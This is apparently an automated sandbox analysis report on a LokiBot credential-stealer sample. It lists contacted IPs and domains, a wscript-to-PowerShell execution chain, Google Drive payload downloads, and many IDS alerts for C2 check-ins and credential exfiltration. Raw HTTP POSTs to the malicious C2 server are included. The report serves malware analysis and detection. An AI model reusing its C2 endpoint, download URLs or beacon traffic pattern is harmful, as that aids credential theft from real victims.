.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
142.250.184.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
137.184.191.215	unknown	United States	11003	PANDGUS	true
216.58.206.46	unknown	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
drive.google.com	142.250.186.46	true
drive.usercontent.google.com	142.250.184.193	true
18.31.95.13.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://137.184.191.215/index.php/10899	true	10%, Virustotal, Browse	unknown

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://137.184.191.215/index.php/10899

Virustotal: Detection: 10%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:65310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:65312 version: TLS 1.2

Source:	Binary string: ore.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3031770631.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdbGCTL source: 31437F.exe.20.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdb source: 31437F.exe.20.dr

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65313 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65313 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:65313 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65314 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65314 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:65314 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65334 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65334 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65334 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65334 -> 137.184.191.215:80

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 137.184.191.215 137.184.191.215

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PANDGUS PANDGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:65310 -> 216.58.206.46:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
